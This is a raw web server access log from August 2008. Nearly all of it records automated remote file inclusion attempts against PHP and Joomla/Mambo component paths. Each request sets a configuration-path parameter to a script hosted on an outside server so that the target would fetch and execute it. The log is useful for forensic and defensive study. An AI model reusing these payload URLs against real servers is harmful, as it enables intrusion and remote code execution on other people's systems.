85.214.88.11 - - [24/Aug/2008:09:54:46 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.desperate-souls.com/templates/portax/images/media/test.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
212.25.179.18 - - [24/Aug/2008:09:54:46 -0700] "GET /logs/access_080811.log///components/com_sef/errors.php?error=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
85.214.88.11 - - [24/Aug/2008:09:54:46 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.desperate-souls.com/templates/portax/images/media/test.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
212.25.179.18 - - [24/Aug/2008:09:54:48 -0700] "GET ///components/com_sef/errors.php?error=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
212.25.179.18 - - [24/Aug/2008:09:54:54 -0700] "GET /logs///components/com_sef/errors.php?error=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
193.91.99.14 - - [24/Aug/2008:09:54:58 -0700] "GET /logs/access_080722.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://pa-lavvenireprato.it/administrator/components/com_remository/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.181.105.117 - - [24/Aug/2008:09:55:04 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.desperate-souls.com/templates/portax/images/media/coi.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
202.181.105.117 - - [24/Aug/2008:09:55:04 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.desperate-souls.com/templates/portax/images/media/coi.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
202.181.105.117 - - [24/Aug/2008:09:55:04 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.desperate-souls.com/templates/portax/images/media/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
202.181.105.117 - - [24/Aug/2008:09:55:04 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.desperate-souls.com/templates/portax/images/media/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
89.249.18.10 - - [24/Aug/2008:09:55:18 -0700] "GET /logs//admin/classes/errors.php?error=http://xwarezx.secretivens.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.249.18.10 - - [24/Aug/2008:09:55:19 -0700] "GET //admin/classes/errors.php?error=http://xwarezx.secretivens.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
198.145.244.100 - - [24/Aug/2008:09:55:27 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://zinero.no/virusteam/cmdx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
198.145.244.100 - - [24/Aug/2008:09:55:27 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://zinero.no/virusteam/cmdx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.56.111.194 - - [24/Aug/2008:09:55:28 -0700] "GET /logs/index.php?p=http://www.pixmag.co.za/templates/rt_replicant/rokzoom/images/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
195.56.111.194 - - [24/Aug/2008:09:55:28 -0700] "GET /logs/access_070927.log/index.php?p=http://www.pixmag.co.za/templates/rt_replicant/rokzoom/images/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
198.145.244.100 - - [24/Aug/2008:09:55:28 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://zinero.no/virusteam/cmdx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
198.145.244.100 - - [24/Aug/2008:09:55:28 -0700] "GET /logs/access_080706.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://zinero.no/virusteam/cmdx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.56.111.194 - - [24/Aug/2008:09:55:28 -0700] "GET /index.php?p=http://www.pixmag.co.za/templates/rt_replicant/rokzoom/images/idd.txt??? HTTP/1.1" 200 9910 "-" "libwww-perl/5.810" "www.dmulk.com"
74.63.2.169 - - [24/Aug/2008:09:55:30 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://125.250.78.194/rgboard/manual/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.63.2.169 - - [24/Aug/2008:09:55:30 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://125.250.78.194/rgboard/manual/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.63.2.169 - - [24/Aug/2008:09:55:30 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://125.250.78.194/rgboard/manual/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
219.117.239.114 - - [24/Aug/2008:09:55:33 -0700] "GET /logs/access.log/errors.php?error=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
217.16.26.124 - - [24/Aug/2008:09:55:42 -0700] "GET //errors.php?dir=http://www.sldating.fr/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
81.26.209.159 - - [24/Aug/2008:09:55:44 -0700] "GET /logs/access_080723.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.64.177.199 - - [24/Aug/2008:09:56:00 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://125.250.78.194/rgboard/manual/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.64.177.199 - - [24/Aug/2008:09:56:00 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://125.250.78.194/rgboard/manual/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
38.117.65.239 - - [24/Aug/2008:09:56:05 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://125.250.78.194/rgboard/manual/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
38.117.65.239 - - [24/Aug/2008:09:56:05 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://125.250.78.194/rgboard/manual/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.75.155.204 - - [24/Aug/2008:09:56:22 -0700] "GET /logs/access_080525.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://125.250.78.194/rgboard/manual/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.56.111.194 - - [24/Aug/2008:09:56:34 -0700] "GET /logs/access_080718.log/index.php?x=http://www.pixmag.co.za/templates/rt_replicant/rokzoom/images/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.194.149.146 - - [24/Aug/2008:09:56:34 -0700] "GET /logs/access_080218.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
195.56.111.194 - - [24/Aug/2008:09:56:37 -0700] "GET /logs/index.php?x=http://www.pixmag.co.za/templates/rt_replicant/rokzoom/images/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
195.56.111.194 - - [24/Aug/2008:09:56:38 -0700] "GET /index.php?x=http://www.pixmag.co.za/templates/rt_replicant/rokzoom/images/idd.txt??? HTTP/1.1" 200 9910 "-" "libwww-perl/5.810" "www.dmulk.com"
195.56.111.194 - - [24/Aug/2008:09:56:39 -0700] "GET /logs/access_080215.log/index.php?x=http://www.pixmag.co.za/templates/rt_replicant/rokzoom/images/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.194.149.146 - - [24/Aug/2008:09:56:44 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.194.149.146 - - [24/Aug/2008:09:56:44 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.194.149.146 - - [24/Aug/2008:09:56:45 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.194.149.146 - - [24/Aug/2008:09:56:46 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.212.173.42 - - [24/Aug/2008:09:56:48 -0700] "GET /logs/access_080811.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.173.42 - - [24/Aug/2008:09:56:49 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 200 10056 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.173.42 - - [24/Aug/2008:09:56:49 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.194.149.146 - - [24/Aug/2008:09:56:56 -0700] "GET /logs/access_080218.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
81.26.209.159 - - [24/Aug/2008:09:56:57 -0700] "GET /logs/access_080226.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.237.152.109 - - [24/Aug/2008:09:56:57 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
81.26.209.159 - - [24/Aug/2008:09:56:57 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.26.209.159 - - [24/Aug/2008:09:56:57 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.212.173.42 - - [24/Aug/2008:09:56:58 -0700] "GET /logs/access_080226.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.173.42 - - [24/Aug/2008:09:56:58 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.173.42 - - [24/Aug/2008:09:56:59 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
198.145.244.100 - - [24/Aug/2008:09:57:00 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://zinero.no/virusteam/cmdx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.63.2.169 - - [24/Aug/2008:09:57:02 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://125.250.78.194/rgboard/manual/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
87.226.77.5 - - [24/Aug/2008:09:57:08 -0700] "GET /logs/access_080229.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.226.77.5 - - [24/Aug/2008:09:57:08 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.226.77.5 - - [24/Aug/2008:09:57:09 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
80.93.56.80 - - [24/Aug/2008:09:57:09 -0700] "GET /%03/administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.posmac.nl/templates/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.25.179.18 - - [24/Aug/2008:09:57:30 -0700] "GET /logs/access_080811.log///components/com_sef/errors.php?error=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
212.25.179.18 - - [24/Aug/2008:09:57:30 -0700] "GET ///components/com_sef/errors.php?error=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
212.25.179.18 - - [24/Aug/2008:09:57:36 -0700] "GET /logs///components/com_sef/errors.php?error=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
69.73.156.4 - - [24/Aug/2008:09:57:47 -0700] "GET /logs/access_080811.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.73.156.4 - - [24/Aug/2008:09:57:48 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 200 10036 "-" "libwww-perl/5.811" "www.dmulk.com"
69.73.156.4 - - [24/Aug/2008:09:57:48 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
80.67.24.32 - - [24/Aug/2008:09:57:58 -0700] "GET /logs/access_080122.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.timtom.it/old.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.24.32 - - [24/Aug/2008:09:57:58 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.timtom.it/old.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.24.32 - - [24/Aug/2008:09:57:58 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.timtom.it/old.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.24.32 - - [24/Aug/2008:09:58:07 -0700] "GET /logs/access_080110.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.timtom.it/old.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.56.111.194 - - [24/Aug/2008:09:58:08 -0700] "GET /logs/access_080224.log/index.php?p=http://www.pixmag.co.za/templates/rt_replicant/rokzoom/images/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.212.173.42 - - [24/Aug/2008:09:58:27 -0700] "GET /logs/access_080723.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
80.237.152.109 - - [24/Aug/2008:09:58:44 -0700] "GET /logs/access_080214.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
80.237.152.109 - - [24/Aug/2008:09:58:46 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
80.237.152.109 - - [24/Aug/2008:09:58:47 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
74.53.240.146 - - [24/Aug/2008:09:58:47 -0700] "GET /logs/access_080723.log/vwar//includes/functions_install.php?vwar_root=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [24/Aug/2008:09:58:47 -0700] "GET /logs/vwar//includes/functions_install.php?vwar_root=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [24/Aug/2008:09:58:52 -0700] "GET /logs/access_080122.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.proostjes.be/calendar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [24/Aug/2008:09:58:54 -0700] "GET /logs/access_080525.log/vwar//includes/functions_install.php?vwar_root=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [24/Aug/2008:09:58:58 -0700] "GET /logs/access_080723.log/vwar//includes/functions_install.php?vwar_root=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [24/Aug/2008:09:58:58 -0700] "GET /logs/vwar//includes/functions_install.php?vwar_root=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.237.152.109 - - [24/Aug/2008:09:58:59 -0700] "GET /logs/access_080416.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
74.53.240.146 - - [24/Aug/2008:09:59:11 -0700] "GET /logs/access_080525.log/vwar//includes/functions_install.php?vwar_root=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.73.156.4 - - [24/Aug/2008:09:59:11 -0700] "GET /logs/access_080723.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
80.237.152.109 - - [24/Aug/2008:09:59:15 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
69.10.154.65 - - [24/Aug/2008:09:59:18 -0700] "GET /logs/access_080811.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.10.154.65 - - [24/Aug/2008:09:59:19 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 200 10036 "-" "libwww-perl/5.810" "www.dmulk.com"
69.10.154.65 - - [24/Aug/2008:09:59:19 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
119.63.193.186 - - [24/Aug/2008:09:59:27 -0700] "HEAD /retreat1/webcam/retreat1_00017.jpg HTTP/1.1" 200 0 "-" "BaiduImagespider+(+http://help.baidu.jp/system/05.html)" "www.dmulk.com"
119.63.193.186 - - [24/Aug/2008:09:59:27 -0700] "GET /retreat1/webcam/retreat1_00017.jpg HTTP/1.1" 200 53501 "-" "BaiduImagespider+(+http://help.baidu.jp/system/05.html)" "www.dmulk.com"
74.52.137.82 - - [24/Aug/2008:09:59:57 -0700] "GET /logs/access_080601.log/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.stubinger-musik.at/event/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.137.82 - - [24/Aug/2008:09:59:57 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.stubinger-musik.at/event/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
219.117.239.114 - - [24/Aug/2008:09:59:57 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
74.52.137.82 - - [24/Aug/2008:09:59:57 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.stubinger-musik.at/event/bo.do??? HTTP/1.1" 200 50 "-" "libwww-perl/5.810" "www.dmulk.com"
213.203.223.25 - - [24/Aug/2008:10:00:04 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://125.250.78.194/rgboard/manual/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.25 - - [24/Aug/2008:10:00:04 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://125.250.78.194/rgboard/manual/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
38.117.65.239 - - [24/Aug/2008:10:00:09 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://125.250.78.194/rgboard/manual/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
38.117.65.239 - - [24/Aug/2008:10:00:10 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://125.250.78.194/rgboard/manual/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.240.146 - - [24/Aug/2008:10:00:15 -0700] "GET /logs/vwar//includes/functions_install.php?vwar_root=http://www.proostjes.be/calendar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [24/Aug/2008:10:00:15 -0700] "GET /vwar//includes/functions_install.php?vwar_root=http://www.proostjes.be/calendar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.117.239.114 - - [24/Aug/2008:10:00:16 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
213.203.202.68 - - [24/Aug/2008:10:00:25 -0700] "GET /logs/access_080515.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.203.202.68 - - [24/Aug/2008:10:00:26 -0700] "GET /logs/access_080405.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.52.244.232 - - [24/Aug/2008:10:00:26 -0700] "GET /logs/access_080811.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.55.37.146 - - [24/Aug/2008:10:00:32 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.bdc4u.com/logo/bo.do?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
74.55.37.146 - - [24/Aug/2008:10:00:32 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.bdc4u.com/logo/bo.do?? HTTP/1.1" 200 50 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
